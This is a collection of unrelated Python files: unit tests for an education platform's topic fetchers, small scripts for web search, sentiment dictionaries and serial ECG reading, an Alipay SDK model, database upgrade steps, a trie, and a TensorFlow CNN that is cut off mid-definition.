self.assertEqual(len(topics), 1)
topics = (
topic_fetchers.get_topics_by_ids([self.TOPIC_ID, 'topic'])
)
# Ruling out the possibility of None for mypy type checking.
assert topics[0] is not None
self.assertEqual(topics[0].to_dict(), expected_topic)
self.assertIsNone(topics[1])
self.assertEqual(len(topics), 2)
def test_raises_error_if_topics_fetched_with_invalid_ids_and_strict(
self
) -> None:
with self.assertRaisesRegex(
Exception,
'No topic model exists for the topic_id: invalid_id'
):
topic_fetchers.get_topics_by_ids(['invalid_id'], strict=True)
def test_get_all_topic_rights_of_user(self) -> None:
topic_rights: List[topic_domain.TopicRights] = (
topic_fetchers.get_topic_rights_with_user(self.user_id_a)
)
self.assertEqual(len(topic_rights), 1)
self.assertEqual(topic_rights[0].id, self.TOPIC_ID)
self.assertEqual(topic_rights[0].manager_ids, [self.user_id_a])
def test_commit_log_entry(self) -> None:
topic_commit_log_entry: (
Optional[topic_models.TopicCommitLogEntryModel]
) = (
topic_models.TopicCommitLogEntryModel.get_commit(
self.TOPIC_ID, 1
)
)
# Ruling out the possibility of None for mypy type checking.
assert topic_commit_log_entry is not None
self.assertEqual(topic_commit_log_entry.commit_type, 'create')
self.assertEqual(topic_commit_log_entry.topic_id, self.TOPIC_ID)
self.assertEqual(topic_commit_log_entry.user_id, self.user_id)
def test_get_all_summaries(self) -> None:
topic_summaries = topic_fetchers.get_all_topic_summaries()
self.assertEqual(len(topic_summaries), 1)
self.assertEqual(topic_summaries[0].name, 'Name')
self.assertEqual(topic_summaries[0].canonical_story_count, 0)
self.assertEqual(topic_summaries[0].additional_story_count, 0)
self.assertEqual(topic_summaries[0].total_skill_count, 2)
self.assertEqual(topic_summaries[0].uncategorized_skill_count, 2)
self.assertEqual(topic_summaries[0].subtopic_count, 1)
def test_get_multi_summaries(self) -> None:
topic_summaries: List[Optional[topic_domain.TopicSummary]] = (
topic_fetchers.get_multi_topic_summaries([
self.TOPIC_ID, 'invalid_id'
])
)
# Ruling out the possibility of None for mypy type checking.
assert topic_summaries[0] is not None
self.assertEqual(len(topic_summaries), 2)
self.assertEqual(topic_summaries[0].name, 'Name')
self.assertEqual(topic_summaries[0].description, 'Description')
self.assertEqual(topic_summaries[0].canonical_story_count, 0)
self.assertEqual(topic_summaries[0].additional_story_count, 0)
self.assertEqual(topic_summaries[0].total_skill_count, 2)
self.assertEqual(topic_summaries[0].uncategorized_skill_count, 2)
self.assertEqual(topic_summaries[0].subtopic_count, 1)
self.assertIsNone(topic_summaries[1])
def test_get_published_summaries(self) -> None:
# Unpublished topics should not be returned.
topic_summaries = topic_fetchers.get_published_topic_summaries()
self.assertEqual(len(topic_summaries), 0)
old_value: List[str] = []
# Publish the topic.
changelist = [topic_domain.TopicChange({
'cmd': topic_domain.CMD_MOVE_SKILL_ID_TO_SUBTOPIC,
'old_subtopic_id': None,
'new_subtopic_id': self.subtopic_id,
'skill_id': self.skill_id_1
}), topic_domain.TopicChange({
'cmd': topic_domain.CMD_UPDATE_TOPIC_PROPERTY,
'property_name': (
topic_domain.TOPIC_PROPERTY_SKILL_IDS_FOR_DIAGNOSTIC_TEST),
'old_value': old_value,
'new_value': [self.skill_id_1]
})]
topic_services.update_topic_and_subtopic_pages(
self.user_id_admin, self.TOPIC_ID, changelist,
'Updated subtopic skill ids.')
topic_services.publish_topic(self.TOPIC_ID, self.user_id_admin)
topic_summaries = topic_fetchers.get_published_topic_summaries()
self.assertEqual(len(topic_summaries), 1)
# Ruling out the possibility of None for mypy type checking.
assert topic_summaries[0] is not None
self.assertEqual(topic_summaries[0].name, 'Name')
self.assertEqual(topic_summaries[0].canonical_story_count, 0)
self.assertEqual(topic_summaries[0].additional_story_count, 0)
self.assertEqual(topic_summaries[0].total_skill_count, 2)
self.assertEqual(topic_summaries[0].uncategorized_skill_count, 1)
self.assertEqual(topic_summaries[0].subtopic_count, 1)
def test_get_all_skill_ids_assigned_to_some_topic(self) -> None:
change_list = [topic_domain.TopicChange({
'cmd': topic_domain.CMD_MOVE_SKILL_ID_TO_SUBTOPIC,
'old_subtopic_id': None,
'new_subtopic_id': 1,
'skill_id': self.skill_id_1
})]
topic_services.update_topic_and_subtopic_pages(
self.user_id_admin, self.TOPIC_ID, change_list,
'Moved skill to subtopic.')
topic_id = topic_fetchers.get_new_topic_id()
self.save_new_topic(
topic_id, self.user_id, name='Name 2', description='Description',
abbreviated_name='random', url_fragment='name-three',
canonical_story_ids=[], additional_story_ids=[],
uncategorized_skill_ids=[self.skill_id_1, 'skill_3'],
subtopics=[], next_subtopic_id=1)
self.assertEqual(
topic_fetchers.get_all_skill_ids_assigned_to_some_topic(),
{self.skill_id_1, self.skill_id_2, 'skill_3'})
def test_get_topic_summary_from_model(self) -> None:
topic_summary_model: Optional[topic_models.TopicSummaryModel] = (
topic_models.TopicSummaryModel.get(self.TOPIC_ID)
)
# Ruling out the possibility of None for mypy type checking.
assert topic_summary_model is not None
topic_summary: topic_domain.TopicSummary = (
topic_fetchers.get_topic_summary_from_model(
topic_summary_model))
self.assertEqual(topic_summary.id, self.TOPIC_ID)
self.assertEqual(topic_summary.name, 'Name')
self.assertEqual(topic_summary.description, 'Description')
self.assertEqual(topic_summary.canonical_story_count, 0)
self.assertEqual(topic_summary.additional_story_count, 0)
self.assertEqual(topic_summary.uncategorized_skill_count, 2)
self.assertEqual(topic_summary.total_skill_count, 2)
self.assertEqual(topic_summary.subtopic_count, 1)
self.assertEqual(topic_summary.thumbnail_filename, 'topic.svg')
self.assertEqual(topic_summary.thumbnail_bg_color, '#C6DCDA')
def test_get_topic_summary_by_id(self) -> None:
topic_summary: Optional[topic_domain.TopicSummary] = (
topic_fetchers.get_topic_summary_by_id(self.TOPIC_ID)
)
# Ruling out the possibility of None for mypy type checking.
assert topic_summary is not None
self.assertEqual(topic_summary.id, self.TOPIC_ID)
self.assertEqual(topic_summary.name, 'Name')
self.assertEqual(topic_summary.description, 'Description')
self.assertEqual(topic_summary.canonical_story_count, 0)
self.assertEqual(topic_summary.additional_story_count, 0)
self.assertEqual(topic_summary.uncategorized_skill_count, 2)
self.assertEqual(topic_summary.subtopic_count, 1)
self.assertEqual(topic_summary.thumbnail_filename, 'topic.svg')
self.assertEqual(topic_summary.thumbnail_bg_color, '#C6DCDA')
fake_topic_id = topic_fetchers.get_new_topic_id()
fake_topic: Optional[topic_domain.TopicSummary] = (
topic_fetchers.get_topic_summary_by_id(
fake_topic_id, strict=False
)
)
self.assertIsNone(fake_topic)
def test_get_new_topic_id(self) -> None:
new_topic_id = topic_fetchers.get_new_topic_id()
self.assertEqual(len(new_topic_id), 12)
self.assertEqual(topic_models.TopicModel.get_by_id(new_topic_id), None)
def test_get_multi_rights(self) -> None:
topic_rights: List[Optional[topic_domain.TopicRights]] = (
topic_fetchers.get_multi_topic_rights([
self.TOPIC_ID, 'invalid_id'
])
)
# Ruling out the possibility of None for mypy type checking.
assert topic_rights[0] is not None
self.assertEqual(len(topic_rights), 2)
self.assertEqual(topic_rights[0].id, self.TOPIC_ID)
self.assertEqual(topic_rights[0].manager_ids, [self.user_id_a])
self.assertFalse(topic_rights[0].topic_is_published)
self.assertIsNone(topic_rights[1])
def test_raises_error_if_wrong_topic_rights_fetched_strictly(self) -> None:
with self.assertRaisesRegex(
Exception,
'No topic_rights exists for the given topic_id: invalid_topic_id'
):
topic_fetchers.get_multi_topic_rights(
['invalid_topic_id'], strict=True
)
|
from search_engine_parser import GoogleSearch
import asyncio
def google(query):
asyncio.set_event_loop(asyncio.new_event_loop())
final_result = ''
try:
linkIndex = 0
search_args = (query, 2)
gsearch = GoogleSearch()
gresults = gsearch.search(*search_args)
queryResult = gresults[linkIndex]["descriptions"]
length_result = len(queryResult)
final_result = ''
        if length_result >= 400: # trim long snippets so they end on a sentence boundary
result = queryResult[:350]
final_result = find_dot(result)
elif length_result >= 300:
result = queryResult[:250]
final_result = find_dot(result)
else:
final_result = queryResult
except Exception as e:
print("Data Not Found, "+str(e))
return final_result
def find_dot(data):
dot_index = data.rfind(".")
print(dot_index)
if dot_index != -1:
return data[:dot_index+1]
else:
return data
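# e.g. find_dot("First sentence. Second sen") -> "First sentence."
# (the input is returned unchanged when it contains no ".")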
#query = input("enter question:")
#print(google(query))
|
from itertools import accumulate as ac
N, K = map(int, input().split())
*S, = map(int, input())
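# Run-length encode S so that runs of 1s sit at even indices and runs of 0s at
# odd indices (zero-length runs are padded in at the ends as needed). Prefix
# sums over the runs then let a sliding window of 2K+1 runs, i.e. at most K
# flipped blocks of 0s, be evaluated in O(1) per position.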
l = []
c = 0
if N==1:
    l.append(1)  # a single character is one run of length 1
else:
for i in range(N-1):
c += 1
if S[i]!=S[i+1]:
l.append(c)
c = 0
    # close the final run; it is never appended inside the loop
    l.append(c + 1)
if S[0]==0:
l = [0]+l
if S[-1]==0:
l.append(0)
size = len(l)
*a, = ac([0]+l)
group_size = min(2*K+1,size)
ans = 0
for i in range(group_size, size+1, 2):
ans = max(ans, a[i]-a[i-group_size])
print(ans) |
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
posts = [
{
'author' : 'Sayan Manik',
'title' : 'Blog post 1',
'content' : 'First Post Content',
'date_posted' : 'May 25, 2019'
},
{
'author' : 'Corey MS',
'title' : 'Blog post 2',
'content' : 'Second Post Content',
'date_posted' : 'May 25, 2019'
},
]
def home(request):
contexts = {
'posts' : posts
}
return render(request,'blogs/home.html',contexts)
def about(request):
return render(request,'blogs/about.html',{'title':'About'}) |
#coding:utf-8
import win_unicode_console
import math
import random
win_unicode_console.enable()
w_list = []
w_score = []
w_dict = []
c = 0
def lis_2_dic(key_list, val_list):
return dict(zip(key_list, val_list))
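# e.g. lis_2_dic(['good', 'bad'], ['1', '-1']) -> {'good': '1', 'bad': '-1'}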
# range() with a user-defined (possibly float) step
def drange(begin, end, step):
n = begin
while n + step < end:
yield n
n += step
# Randomly rewrite n dictionary entries so their score becomes "No_Score"
# (validation that treats existing words as unknown words)
def makedata_rand(num):
    # fixed seed; remove this for the real experiment
random.seed(0)
n = 0
while n < 10:
rand = random.randint(0,num)
w_score[rand] = "No_Score"
print(rand, w_list[rand], w_score[rand])
n += 1
def make_dic():
global c
f = open('pn_ja.dic.txt', 'r')
for line in f:
line = line.rstrip()
term = line.split(':')
w_list.append(term[0])
w_score.append(term[3])
# of words
c += 1
f.close()
if __name__ == "__main__":
make_dic()
w_dict = lis_2_dic(w_list, w_score)
#55125 words in dictionary
#print(c)
    # note: sorted() returns a new list, which is discarded here; w_dict itself stays unsorted
    sorted(w_dict.items(), key = lambda x: x[1])
# print(str(k) + ": " + str(v))
check = 0
count = 0
miss, miss_c = 0, 0
for i in drange(-1.0, 1.0, 0.1):
for v in w_dict.values():
if float(v) >= i and float(v) < i+0.1:
count += 1
else:
continue
        # round() output looks buggy here!
#print(str(round(i,1)) + " ~ " + str(round(i,1)+ round(0.10,1)) + ": " + str(count))
check += count
count = 0
    # randomly mark entries as No_Score
makedata_rand(check)
    # total word count (doesn't quite match, though)
#print(check)
|
# -* encoding:utf-8 *-
from appium import webdriver
import time
import unittest
import os
import math
class AutoTest(unittest.TestCase):
def test_setUp(self):
desired_caps = {
            'platformName' : 'Android', # test platform name
            'deviceName' : '192.168.56.101:5555', # device id, as listed by `adb devices`
            'platformVersion' : '4.4.4', # platform version (device firmware version)
            'appPackage' : 'com.football.soccerbook', # application package name
            'appActivity' : 'com.soka.football.home.ui.login.activity.SplashActivity', # application activity name
            'unicodeKeyboard' : 'True', # use the unicode keyboard, enabling Chinese and special characters
            'resetKeyboard' : 'True' # restore the original keyboard after the test case finishes
}
# self.driver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)
self.driver = webdriver.Remote('http://0.0.0.0:4723/wd/hub',desired_caps)
        self.driver.implicitly_wait(3) # implicit wait; see note below:
        # When an element is not immediately present, the implicit wait keeps polling the DOM
        # for up to the given time before failing (default 0). Once set, it lasts for the whole
        # lifetime of the WebDriver instance and applies to every element lookup, which
        # lengthens the overall test run.
# def test_login(self):
# def tearDown(self):
# self.driver.quit()
if __name__ == '__main__':
# suite = unittest.TestLoader().loadTestsFromTestCase(AutoTest)
# unittest.TextTestRunner(verbosity=2).run(suite)
unittest.main() |
from numpy import*
from numpy.linalg import*
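# Reads a 2-D array literal (e.g. [[1,2,3],[4,5,6]]) from stdin and prints the
# 1-based index of every column whose column sum is maximal.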
x=array(eval(input("")))
a=zeros(x.shape[1], dtype=int)
for j in range(x.shape[1]):
a[j]=sum(x[:,j])
for j in range(x.shape[1]):
    if a[j] == max(a):
        print(j + 1)  # 1-based index of a column with the maximal sum
|
tabla = int(input("Which table?: "))
for v in range(1, 11):
    print(f"{tabla} x {v} = {tabla*v}")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class ExpenseCtrlEmployeeRuleInfo(object):
def __init__(self):
self._effective = None
self._effective_end_date = None
self._effective_start_date = None
self._owner_type = None
self._standard_id = None
self._standard_name = None
@property
def effective(self):
return self._effective
@effective.setter
def effective(self, value):
self._effective = value
@property
def effective_end_date(self):
return self._effective_end_date
@effective_end_date.setter
def effective_end_date(self, value):
self._effective_end_date = value
@property
def effective_start_date(self):
return self._effective_start_date
@effective_start_date.setter
def effective_start_date(self, value):
self._effective_start_date = value
@property
def owner_type(self):
return self._owner_type
@owner_type.setter
def owner_type(self, value):
self._owner_type = value
@property
def standard_id(self):
return self._standard_id
@standard_id.setter
def standard_id(self, value):
self._standard_id = value
@property
def standard_name(self):
return self._standard_name
@standard_name.setter
def standard_name(self, value):
self._standard_name = value
def to_alipay_dict(self):
params = dict()
if self.effective:
if hasattr(self.effective, 'to_alipay_dict'):
params['effective'] = self.effective.to_alipay_dict()
else:
params['effective'] = self.effective
if self.effective_end_date:
if hasattr(self.effective_end_date, 'to_alipay_dict'):
params['effective_end_date'] = self.effective_end_date.to_alipay_dict()
else:
params['effective_end_date'] = self.effective_end_date
if self.effective_start_date:
if hasattr(self.effective_start_date, 'to_alipay_dict'):
params['effective_start_date'] = self.effective_start_date.to_alipay_dict()
else:
params['effective_start_date'] = self.effective_start_date
if self.owner_type:
if hasattr(self.owner_type, 'to_alipay_dict'):
params['owner_type'] = self.owner_type.to_alipay_dict()
else:
params['owner_type'] = self.owner_type
if self.standard_id:
if hasattr(self.standard_id, 'to_alipay_dict'):
params['standard_id'] = self.standard_id.to_alipay_dict()
else:
params['standard_id'] = self.standard_id
if self.standard_name:
if hasattr(self.standard_name, 'to_alipay_dict'):
params['standard_name'] = self.standard_name.to_alipay_dict()
else:
params['standard_name'] = self.standard_name
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = ExpenseCtrlEmployeeRuleInfo()
if 'effective' in d:
o.effective = d['effective']
if 'effective_end_date' in d:
o.effective_end_date = d['effective_end_date']
if 'effective_start_date' in d:
o.effective_start_date = d['effective_start_date']
if 'owner_type' in d:
o.owner_type = d['owner_type']
if 'standard_id' in d:
o.standard_id = d['standard_id']
if 'standard_name' in d:
o.standard_name = d['standard_name']
return o
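# Minimal usage sketch (hypothetical field values), showing the dict round trip
# used by the Alipay SDK serializers:
#   rule = ExpenseCtrlEmployeeRuleInfo()
#   rule.standard_id = 'STD-001'
#   rule.owner_type = 'EMPLOYEE'
#   d = rule.to_alipay_dict()  # only truthy fields are included
#   ExpenseCtrlEmployeeRuleInfo.from_alipay_dict(d).standard_id  # 'STD-001'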
|
#!/usr/bin/python
import sys
import csv
import serial
import os
from itertools import izip
from ctypes import *
from struct import pack, unpack
import struct
import binascii
t = 0
f = open('/home/kalach/workfile.csv', 'wb')
ser = serial.Serial('/dev/rfcomm0', timeout = 5)
x = ser.read(10) # before starting, read past this MARK BUTN marker
def readData(t):
    x = ser.read(9) # ECG DATA
    s = ord(ser.read(1)) # low byte of the data size
    e = ord(ser.read(1)) # high byte of the data size
    data_size = (s + e*256) - 10 # 10 - size of header
print data_size
x = ser.read(8) # pass header chunk
for i in range(0, data_size / 2):
s = ser.read(1)
e = ser.read(1)
Voltage = [unpack('B', s)[0] + unpack('b',e)[0] * 256]
temp = [t + 1]
#print Voltage
writer = csv.writer(f,delimiter='\t',lineterminator='\n',)
writer.writerows(izip(temp, Voltage))
t = temp[0]
x = ser.read(2) # pass \r\n
return temp[0]
for i in range(0, 50):
t = readData(t)
f.close()
ser.close()
|
# The knows API is already defined for you.
# return a bool, whether a knows b
def knows(a: int, b: int) -> bool:
return True
class Solution:
def findCelebrity(self, n: int) -> int:
# find candidate for celebrity
# when left and right meet at a point, this person is a potential celebrity
left, right = 0, n-1
while left < right:
if knows(left, right):
left += 1
else:
right -= 1
# verify if the candidate is a celebrity
for i in range(n):
# case 1: at least 1 person doesn't know this candidate => not a celebrity
if not knows(i, left) and i != left:
return -1
# case 2: candidate knows at least one person => not a celebrity
if knows(left, i) and i != left:
return -1
return left
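# Minimal sketch (hypothetical 3-person matrix M where M[a][b] == knows(a, b)):
#   M = [[1, 1, 0],
#        [0, 1, 0],
#        [1, 1, 1]]
# With knows(a, b) backed by M, findCelebrity(3) returns 1: everyone knows
# person 1 and person 1 knows no one else. The two-pointer scan costs O(n)
# calls to knows, plus O(n) more to verify the surviving candidate.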
|
# -*- coding: utf-8 -*-
"""Tests for pybaselines._compat.
@author: Donald Erb
Created on March 20, 2021
"""
from numpy.testing import assert_array_equal
import pytest
from pybaselines import _compat
from .conftest import _HAS_PENTAPY
def test_pentapy_installation():
"""Ensure proper setup with pentapy."""
assert _compat._HAS_PENTAPY == _HAS_PENTAPY
if not _HAS_PENTAPY:
with pytest.raises(NotImplementedError):
_compat._pentapy_solve()
def test_prange():
"""
Ensures that prange outputs the same as range.
prange should work exactly as range, regardless of whether or not
numba is installed.
"""
start = 3
stop = 9
step = 2
expected = list(range(start, stop, step))
output = list(_compat.prange(start, stop, step))
assert expected == output
def _add(a, b):
"""
Simple function that adds two things.
Will be decorated for testing.
"""
output = a + b
return output
def test_jit():
"""Ensures the jit decorator works regardless of whether or not numba is installed."""
input_1 = 5
input_2 = 6
expected = input_1 + input_2
output = _compat.jit(_add)(input_1, input_2)
assert_array_equal(expected, output)
def test_jit_kwargs():
"""Ensure the jit decorator works with kwargs whether or not numba is installed."""
input_1 = 5
input_2 = 6
expected = input_1 + input_2
output = _compat.jit(_add, cache=True)(input_1, b=input_2)
assert_array_equal(expected, output)
def test_jit_no_parentheses():
"""Ensure the jit decorator works with no parentheses whether or not numba is installed."""
@_compat.jit
def _add2(a, b):
"""
Simple function that adds two things.
For testing whether the jit decorator works without parentheses.
"""
output = a + b
return output
input_1 = 5
input_2 = 6
expected = input_1 + input_2
output = _add2(input_1, input_2)
assert_array_equal(expected, output)
def test_jit_no_inputs():
"""Ensure the jit decorator works with no arguments whether or not numba is installed."""
@_compat.jit()
def _add3(a, b):
"""
Simple function that adds two things.
For testing whether the jit decorator works without any arguments.
"""
output = a + b
return output
input_1 = 5
input_2 = 6
expected = input_1 + input_2
output = _add3(input_1, input_2)
assert_array_equal(expected, output)
def test_jit_signature():
"""Ensure the jit decorator works with a signature whether or not numba is installed."""
@_compat.jit('int64(int64, int64)')
def _add4(a, b):
"""
Simple function that adds two things.
For testing whether the jit decorator works with a function signature.
"""
output = a + b
return output
input_1 = 5
input_2 = 6
expected = input_1 + input_2
output = _add4(input_1, input_2)
assert_array_equal(expected, output)
|
from snovault import upgrade_step
from . import _get_biofeat_for_target as getbf4t
@upgrade_step('experiment_repliseq', '1', '2')
def experiment_repliseq_1_2(value, system):
if value['experiment_type'] == 'repliseq':
value['experiment_type'] = 'Repli-seq'
@upgrade_step('experiment_repliseq', '2', '3')
def experiment_repliseq_2_3(value, system):
# sticking the string in antibody field into Notes
# will require subsequent manual fix to link to Antibody object
if value.get('antibody'):
if value.get('notes'):
value['notes'] = value['notes'] + '; ' + value['antibody']
else:
value['notes'] = value['antibody']
del value['antibody']
# if antibody_lot_id exists it should be fine in new field
@upgrade_step('experiment_chiapet', '1', '2')
def experiment_chiapet_1_2(value, system):
# sticking the string in antibody field into Notes
# will require subsequent manual fix to link to Antibody object
if value.get('antibody'):
if value.get('notes'):
value['notes'] = value['notes'] + '; ' + value['antibody']
else:
value['notes'] = value['antibody']
del value['antibody']
@upgrade_step('experiment_chiapet', '2', '3')
def experiment_chiapet_2_3(value, system):
if value.get('experiment_type') == 'CHIA-pet':
value['experiment_type'] = 'ChIA-PET'
@upgrade_step('experiment_damid', '1', '2')
def experiment_damid_1_2(value, system):
if value.get('index_pcr_cycles'):
value['pcr_cycles'] = value['index_pcr_cycles']
del value['index_pcr_cycles']
if value.get('fusion'):
if value.get('notes'):
value['notes'] = value['notes'] + '; ' + value['fusion']
else:
value['notes'] = value['fusion']
del value['fusion']
@upgrade_step('experiment_mic', '1', '2')
def experiment_mic_1_2(value, system):
fish_dict = {'DNA-FiSH': 'DNA FISH', 'RNA-FiSH': 'RNA FISH', 'FiSH': 'FISH'}
if value.get('experiment_type') and value['experiment_type'] in fish_dict.keys():
value['experiment_type'] = fish_dict[value['experiment_type']]
@upgrade_step('experiment_seq', '1', '2')
def experiment_seq_1_2(value, system):
# sticking the string in antibody field into Notes
# will require subsequent manual fix to link to Antibody object
if value.get('antibody'):
if value.get('notes'):
value['notes'] = value['notes'] + '; ' + value['antibody']
else:
value['notes'] = value['antibody']
del value['antibody']
@upgrade_step('experiment_seq', '2', '3')
def experiment_seq_2_3(value, system):
if value.get('experiment_type') == 'CHIP-seq':
value['experiment_type'] = 'ChIP-seq'
@upgrade_step('experiment_atacseq', '1', '2')
@upgrade_step('experiment_capture_c', '1', '2')
@upgrade_step('experiment_chiapet', '3', '4')
@upgrade_step('experiment_damid', '2', '3')
@upgrade_step('experiment_hi_c', '1', '2')
@upgrade_step('experiment_mic', '2', '3')
@upgrade_step('experiment_repliseq', '3', '4')
@upgrade_step('experiment_seq', '3', '4')
@upgrade_step('experiment_tsaseq', '1', '2')
def experiment_1_2(value, system):
exptype = value.get('experiment_type')
if exptype == 'Repli-seq':
tot_fracs = value.get('total_fractions_in_exp', 2)
if tot_fracs > 2:
exptype = 'Multi-stage Repli-seq'
else:
exptype = '2-stage Repli-seq'
elif exptype == 'DAM-ID seq':
exptype = 'DamID-seq'
valid_exptypes = system['registry']['collections']['ExperimentType']
exptype_item = valid_exptypes.get(exptype)
if not exptype_item:
exptypename = exptype.lower().replace(' ', '-')
exptype_item = valid_exptypes.get(exptypename)
exptype_uuid = None
try:
exptype_uuid = str(exptype_item.uuid)
except AttributeError:
note = '{} ITEM NOT FOUND'.format(exptype)
if 'notes' in value:
note = value['notes'] + '; ' + note
value['notes'] = note
value['experiment_type'] = exptype_uuid
@upgrade_step('experiment_seq', '4', '5')
@upgrade_step('experiment_chiapet', '4', '5')
@upgrade_step('experiment_damid', '3', '4')
@upgrade_step('experiment_tsaseq', '2', '3')
def experiment_targeted_factor_upgrade(value, system):
factor = value.get('targeted_factor')
if factor:
del value['targeted_factor']
note = 'Old Target: {}'.format(factor)
targets = system['registry']['collections']['Target']
biofeats = system['registry']['collections']['BioFeature']
target = targets.get(factor)
if target:
bfuuid = getbf4t(target, biofeats)
if bfuuid:
value['targeted_factor'] = [bfuuid]
else:
note = 'UPDATE NEEDED: ' + note
if 'notes' in value:
note = value['notes'] + '; ' + note
value['notes'] = note
@upgrade_step('experiment_capture_c', '2', '3')
def experiment_capture_c_1_2(value, system):
tregions = value.get('targeted_regions')
if tregions:
new_vals = []
del value['targeted_regions']
targets = system['registry']['collections']['Target']
biofeats = system['registry']['collections']['BioFeature']
note = ''
for tr in tregions:
t = tr.get('target') # it's required
of = tr.get('oligo_file', '')
tstr = 'Old Target: {} {}'.format(t, of)
target = targets.get(t)
if target:
bfuuid = getbf4t(target, biofeats)
if bfuuid:
tinfo = {'target': [bfuuid]}
if of:
tinfo['oligo_file'] = of
new_vals.append(tinfo)
else:
tstr = 'UPDATE NEEDED: ' + tstr
note += tstr
if new_vals:
value['targeted_regions'] = new_vals
if 'notes' in value:
note = value['notes'] + '; ' + note
value['notes'] = note
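# Rough sketch (hypothetical value dict) of how an upgrade step mutates its
# input in place; this particular step ignores the system argument:
#   value = {'experiment_type': 'repliseq'}
#   experiment_repliseq_1_2(value, system=None)
#   value  # {'experiment_type': 'Repli-seq'}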
|
# -*- coding: utf-8 -*-
# @Time : 2019/9/7 18:09
# @Author : LI Dongdong
# @FileName: lc 208.py
class TrieNode:
def __init__(self):
        # whether this node completes a whole word
self.is_end = False
self.children = [None] * 26
class Trie:
def __init__(self):
"""
Initialize your data structure here.
"""
        # so we don't have to recreate the root node at every step
self.root = TrieNode()
def insert(self, word: str) -> None:
"""
Inserts a word into the trie.
"""
        ############## approach adapted from an online solution ##############
p = self.root
n = len(word)
for i in range(n):
if p.children[ord(word[i]) - ord('a')] is None:
new_node = TrieNode()
if i == n - 1:
new_node.is_end = True
p.children[ord(word[i]) - ord('a')] = new_node
p = new_node
else:
                # taken on repeated inserts, e.g. inserting 'woord' and then 'wor'
p = p.children[ord(word[i]) - ord('a')]
if i == n - 1:
p.is_end = True
return
    def search(self, word: str) -> bool:
        """
        Returns if the word is in the trie.
        """
p=self.root
        # check that every letter of word is in the trie
for c in word:
            # children stores the child nodes: a 26-slot list, one per letter
            # p advances one level per letter
p=p.children[ord(c)-ord('a')]
if p is None:
return False
        # the final node must be marked as a word end; otherwise searching 'app'
        # when only 'appl' was inserted would wrongly return True
        return p.is_end
def startsWith(self, prefix: str) -> bool:
"""
Returns if there is any word in the trie that starts with the given prefix.
"""
p=self.root
for c in prefix:
p=p.children[ord(c)-ord('a')]
if p is None:
return False
return True
obj = Trie()
obj.insert('woord')
obj.insert('wod')
obj.insert('aod')
print(obj.search('woord'))  # True: 'woord' was inserted
print(obj.search('wooe'))  # False: 'wooe' is not in the trie |
import tensorflow as tf
import numpy as np
import load_cifer10
import random
np.random.seed(20160612)
tf.set_random_seed(20160612)
# network definition
class layer:
def __init__(self):
with tf.Graph().as_default():
self.prepare_model()
self.prepare_session()
def prepare_model(self):
with tf.name_scope('input_layer'):
with tf.name_scope('input_size'):
input_size = 3072
with tf.name_scope('x'):
x = tf.placeholder(tf.float32, [None, input_size])
with tf.name_scope('x_image'):
x_image = tf.reshape(x, [-1, 32, 32, 3])
with tf.name_scope('conv_layer3'):
with tf.name_scope('num_filter3'):
num_filters3 = 16
with tf.name_scope('W_conv3'):
W_conv3 = tf.Variable(tf.truncated_normal([3, 3, 3, num_filters3],
stddev=0.1))
with tf.name_scope('h_conv3'):
h_conv3 = tf.nn.conv2d(x_image, W_conv3,
strides=[1, 1, 1, 1], padding='SAME')
with tf.name_scope('b_conv3'):
b_conv3 = tf.Variable(tf.constant(0.1, shape=[num_filters3]))
with tf.name_scope('h_pool3'):
h_pool3 = tf.nn.max_pool(h_conv3, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
with tf.name_scope('h_conv3_cutoff'):
h_conv3_cutoff = tf.nn.relu(h_pool3 + b_conv3)
with tf.name_scope('conv_layer2'):
with tf.name_scope('num_filter2'):
num_filters2 = 32
with tf.name_scope('W_conv2'):
W_conv2 = tf.Variable(tf.truncated_normal([4, 4, num_filters3, num_filters2],
stddev=0.1))
with tf.name_scope('h_conv2'):
h_conv2 = tf.nn.conv2d(h_conv3_cutoff, W_conv2,
strides=[1, 1, 1, 1], padding='SAME')
with tf.name_scope('b_conv2'):
b_conv2 = tf.Variable(tf.constant(0.1, shape=[num_filters2]))
with tf.name_scope('h_pool2'):
h_pool2 = tf.nn.max_pool(h_conv2, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
with tf.name_scope('h_conv_cutoff'):
h_conv2_cutoff = tf.nn.relu(h_pool2 + b_conv2)
with tf.name_scope('conv_layer1'):
with tf.name_scope('num_filter1'):
num_filters1 = 3 # 64
with tf.name_scope('W_conv1'):
W_conv1 = tf.Variable(
tf.truncated_normal([5, 5, num_filters2, num_filters1],
stddev=0.1))
with tf.name_scope('h_conv1'):
h_conv1 = tf.nn.conv2d(h_conv2_cutoff, W_conv1,
strides=[1, 1, 1, 1], padding='SAME')
with tf.name_scope('b_conv1'):
b_conv1 = tf.Variable(tf.constant(0.1, shape=[num_filters1]))
with tf.name_scope('h_pool1'):
h_pool1 = tf.nn.max_pool(h_conv1, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
with tf.name_scope('h_conv1'):
h_conv1_cutoff = tf.nn.relu(h_pool1 + b_conv1)
with tf.name_scope('h_pool1_flat'):
h_pool1_flat = tf.reshape(h_conv1_cutoff, [-1, 4 * 4 * num_filters1])
with tf.name_scope('num_units2'):
num_units2 = 4 * 4 * num_filters1
"""
with tf.name_scope('W_conv1'):
W_conv1 = tf.Variable(
tf.truncated_normal([5, 5, num_filters2, num_filters1],
stddev=0.1))
with tf.name_scope('h_conv1'):
h_conv1 = tf.nn.conv2d(h_conv2_cutoff, W_conv1,
strides=[1, 1, 1, 1], padding='SAME')
with tf.name_scope('b_conv1'):
b_conv1 = tf.Variable(tf.constant(0.1, shape=[num_filters1]))
with tf.name_scope('h_pool1'):
h_pool1 = tf.nn.max_pool(h_conv1, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
h_pool1 = tf.nn.max_pool(h_conv1, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
with tf.name_scope('h_conv1'):
h_conv1_cutoff = tf.nn.relu(h_pool1 + b_conv1)
with tf.name_scope('h_pool1_flat'):
h_pool1_flat = tf.reshape(h_conv1_cutoff, [-1, 4 * 4 * num_filters1])
with tf.name_scope('num_units2'):
num_units2 = 4 * 4 * num_filters1
"""
with tf.name_scope('layer1_fully_connected'):
with tf.name_scope('num_units1'):
